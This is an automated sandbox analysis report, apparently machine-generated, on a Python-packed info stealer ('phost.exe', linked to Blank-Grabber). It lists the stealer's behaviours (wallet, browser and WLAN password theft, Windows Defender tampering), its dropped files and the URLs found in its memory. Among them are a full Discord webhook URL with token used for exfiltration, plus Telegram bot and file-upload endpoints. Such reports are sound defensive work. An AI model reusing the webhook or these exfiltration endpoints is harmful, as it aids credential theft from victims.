162.159.137.232, 443, 49745 CLOUDFLARENETUS United States 18->80 92 Found many strings related to Crypto-Wallets (likely being stolen) 18->92 94 Uses cmd line tools excessively to alter registry or file data 18->94 96 Tries to harvest and steal browser information (history, passwords, etc) 18->96 98 6 other signatures 18->98 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 18->27         started        29 35 other processes 18->29 signatures10 process11 signatures12 100 Suspicious powershell command line found 22->100 102 Uses cmd line tools excessively to alter registry or file data 22->102 104 Encrypted powershell cmdline option found 22->104 114 2 other signatures 22->114 31 powershell.exe 23 22->31         started        34 conhost.exe 22->34         started        106 Modifies Windows Defender protection settings 25->106 108 Removes signatures from Windows Defender 25->108 36 powershell.exe 25->36         started        46 2 other processes 25->46 110 Adds a directory exclusion to Windows Defender 27->110 38 powershell.exe 27->38         started        40 conhost.exe 27->40         started        112 Tries to harvest and steal WLAN passwords 29->112 42 getmac.exe 29->42         started        44 systeminfo.exe 29->44         started        48 68 other processes 29->48 process13 file14 124 Loading BitLocker PowerShell Module 31->124 126 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->126 128 Writes or reads registry keys via WMI 42->128 58 C:\Users\user\AppData\...\jnxiphgt.cmdline, Unicode 48->58 dropped 60 C:\Users\user\AppData\Local\Temp\C7XW6.zip, RAR 48->60 dropped 51 csc.exe 48->51         started        54 conhost.exe 48->54         started        signatures15 process16 file17 62 C:\Users\user\AppData\Local\...\jnxiphgt.dll, PE32 51->62 dropped 56 cvtres.exe 51->56         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              phost.exe34%ReversingLabsWin64.Trojan.Znyonm
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI32202\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_decimal.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\python312.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\select.pyd4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\sqlite3.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pyd4%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.137.232
              truetrue
                ip-api.com
                208.95.112.1
                truetrue
                  blank-c9yfy.in
                  unknown
                  unknownfalse
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMGtrue
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabphost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpfalse
                        https://github.com/Blank-c/BlankOBFphost.exe, 00000001.00000003.1696381167.000001AE1D8A6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1696732684.000001AE1D31E000.00000004.00000020.00020000.00000000.sdmpfalse
                          https://www.avito.ru/phost.exe, 00000001.00000002.2179183258.000001AE1DBA0000.00000004.00001000.00020000.00000000.sdmpfalse
                            https://duckduckgo.com/ac/?q=phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://api.gofile.io/getServerrzrphost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpfalse
                                https://api.telegram.org/botphost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpfalse
                                  https://github.com/Blank-c/Blank-Grabberiphost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpfalse
                                    http://crl.microsoftpowershell.exe, 0000004A.00000002.2037939730.000001C72DC70000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://www.ctrip.com/phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        https://github.com/Blank-c/Blank-Grabberrphost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpfalse
                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000014.00000003.1751303220.000001E22D953000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#phost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://support.mozilla.org/produphost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://www.leboncoin.fr/phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  https://tools.ietf.org/html/rfc2388#section-4.4phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64phost.exe, 00000001.00000002.2176356488.000001AE1B291000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000014.00000003.1751303220.000001E22D906000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://weibo.com/phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://api.anonfiles.com/uploadphost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsphost.exe, 00000001.00000002.2178966357.000001AE1D9A0000.00000004.00001000.00020000.00000000.sdmptrue
                                                              https://www.msn.comphost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E974000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1792042705.000002119FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C7259B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C71739C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  https://discord.com/api/v9/users/phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963phost.exe, 00000001.00000002.2178966357.000001AE1DA0C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      http://cacerts.digiphost.exe, 00000000.00000003.1678758922.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://www.microsoftXZXHAV~1.DOCy.QN_phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://peps.python.org/pep-0205/phost.exe, 00000001.00000002.2177140880.000001AE1D0A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            https://www.reddit.com/phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1766471462.000002118FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C715941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://www.amazon.ca/phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamephost.exe, 00000001.00000002.2176648071.000001AE1CC60000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyphost.exe, 00000001.00000002.2179089914.000001AE1DAA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          https://www.ebay.co.uk/phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            http://www.microsoftHEETS~1.MD5y./phost.exe, 00000001.00000003.2170059092.000001AE1D721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000004A.00000002.1977970654.000001C717252000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1766471462.00000211900C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://www.ebay.de/phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000004A.00000002.1977970654.000001C717252000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codephost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CCDC000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://go.micropowershell.exe, 0000004A.00000002.1977970654.000001C716575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerphost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://www.amazon.com/phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://github.com/python/cpython/issues/86361.phost.exe, 00000001.00000003.1702435717.000001AE1D5F8000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702994368.000001AE1D630000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://contoso.com/Iconpowershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://httpbin.org/phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://crl.ver)svchost.exe, 00000014.00000002.2946070678.000001E22DA00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sphost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulephost.exe, 00000001.00000002.2176790969.000001AE1CEA0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesphost.exe, 00000001.00000002.2176790969.000001AE1CEA0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://www.ecosia.org/newtab/phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brphost.exe, 00000001.00000003.1842261128.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.youtube.com/phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      https://allegro.pl/phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000004A.00000002.1977970654.000001C717252000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1832092199.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704273079.000001AE1D718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syphost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://MD8.mozilla.org/1/mphost.exe, 00000001.00000003.1866119745.000001AE1E6F3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                https://www.python.org/psf/license/phost.exe, 00000001.00000002.2183769002.00007FFDFB6E2000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                  http://ip-api.com/line/?fields=hostingrzrphost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://www.bbc.co.uk/phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      https://bugzilla.mophost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        http://www.microsoftTASKLI~1.TXTy./phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://api.anonfiles.com/uploadrphost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3phost.exe, 00000001.00000002.2179089914.000001AE1DAA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1766471462.00000211900C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://google.com/mailphost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2175758589.000001AE1D383000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177552719.000001AE1D385000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://packaging.python.org/specifications/entry-points/phost.exe, 00000001.00000003.1704273079.000001AE1D771000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178858146.000001AE1D8A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesphost.exe, 00000001.00000003.2167660271.000001AE1E69E000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169808101.000001AE1E0D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.python.org/psf/license/)phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyphost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.google.com/phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1862017771.000001AE1E691000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://www.iqiyi.com/phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539phost.exe, 00000001.00000002.2178966357.000001AE1DA0C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.phost.exe, 00000001.00000003.1854068522.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1886265486.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2170059092.000001AE1D721000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704273079.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1817643168.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://google.com/phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFphost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://ocsp.sectigo.com0phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpfalse
